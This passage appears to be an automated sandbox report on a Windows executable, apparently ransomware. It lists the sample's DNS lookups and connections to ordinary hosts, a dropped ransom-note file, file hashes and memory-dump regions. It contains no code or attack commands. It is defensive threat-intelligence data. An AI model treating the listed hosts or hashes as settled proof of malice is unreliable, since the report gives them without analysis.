                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              1.9kB
                                                                                                                                                              61.4kB
                                                                                                                                                              33
                                                                                                                                                              52

                                                                                                                                                              HTTP Request

                                                                                                                                                              GET https://www.google.com/

                                                                                                                                                              HTTP Response

                                                                                                                                                              200
                                                                                                                                                            • 216.239.32.29:80
                                                                                                                                                              http://pki.goog/gsr1/gsr1.crt
                                                                                                                                                              http
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              351 B
                                                                                                                                                              1.8kB
                                                                                                                                                              5
                                                                                                                                                              4

                                                                                                                                                              HTTP Request

                                                                                                                                                              GET http://pki.goog/gsr1/gsr1.crt

                                                                                                                                                              HTTP Response

                                                                                                                                                              200
                                                                                                                                                            • 52.1.55.52:443
                                                                                                                                                              www.poweradmin.com
                                                                                                                                                              tls
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              260 B
                                                                                                                                                              92 B
                                                                                                                                                              3
                                                                                                                                                              2
                                                                                                                                                            • 52.1.55.52:443
                                                                                                                                                              www.poweradmin.com
                                                                                                                                                              tls
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              260 B
                                                                                                                                                              92 B
                                                                                                                                                              3
                                                                                                                                                              2
                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              71 B
                                                                                                                                                              135 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              raw.githubusercontent.com

                                                                                                                                                              DNS Response

                                                                                                                                                              185.199.108.133
                                                                                                                                                              185.199.109.133
                                                                                                                                                              185.199.110.133
                                                                                                                                                              185.199.111.133

                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              www.google.com
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              60 B
                                                                                                                                                              76 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              www.google.com

                                                                                                                                                              DNS Response

                                                                                                                                                              142.250.200.4

                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              pki.goog
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              54 B
                                                                                                                                                              70 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              pki.goog

                                                                                                                                                              DNS Response

                                                                                                                                                              216.239.32.29

                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              www.microsoft.com
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              63 B
                                                                                                                                                              230 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              www.microsoft.com

                                                                                                                                                              DNS Response

                                                                                                                                                              173.222.13.219

                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              www.poweradmin.com
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              64 B
                                                                                                                                                              94 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              www.poweradmin.com

                                                                                                                                                              DNS Response

                                                                                                                                                              52.1.55.52

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              8431b684bc613c7d26c3c02d145efb69

                                                                                                                                                              SHA1

                                                                                                                                                              1d20d2f3fb60343bf6fde19f0e1499ee927b1106

                                                                                                                                                              SHA256

                                                                                                                                                              18675fab39e559bedd77139c7fe49d77b353e9940cfdf54058036af8a90f620e

                                                                                                                                                              SHA512

                                                                                                                                                              edbbb6337991756c6cb0d3660e68d9319764d3cfc703aa354ea7e0b13506cd42960f8e285b938fd13fb2b24f3fa15f359e4beeab538e058f75c04cf11fff5c48

                                                                                                                                                            • memory/1212-5-0x0000000070690000-0x0000000070C3B000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              5.7MB

                                                                                                                                                            • memory/1212-6-0x0000000001C10000-0x0000000001C50000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              256KB

                                                                                                                                                            • memory/1212-7-0x0000000070690000-0x0000000070C3B000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              5.7MB

                                                                                                                                                            • memory/1212-8-0x0000000001C10000-0x0000000001C50000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              256KB

                                                                                                                                                            • memory/1212-9-0x0000000001C10000-0x0000000001C50000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              256KB

                                                                                                                                                            • memory/1212-10-0x0000000070690000-0x0000000070C3B000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              5.7MB

                                                                                                                                                            • memory/2392-0-0x0000000000380000-0x000000000039C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/2392-1-0x0000000074800000-0x0000000074EEE000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.9MB

                                                                                                                                                            • memory/2392-2-0x0000000000500000-0x0000000000540000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              256KB

                                                                                                                                                            • memory/2392-150-0x0000000074800000-0x0000000074EEE000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.9MB

                                                                                                                                                            We care about your privacy.

                                                                                                                                                            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.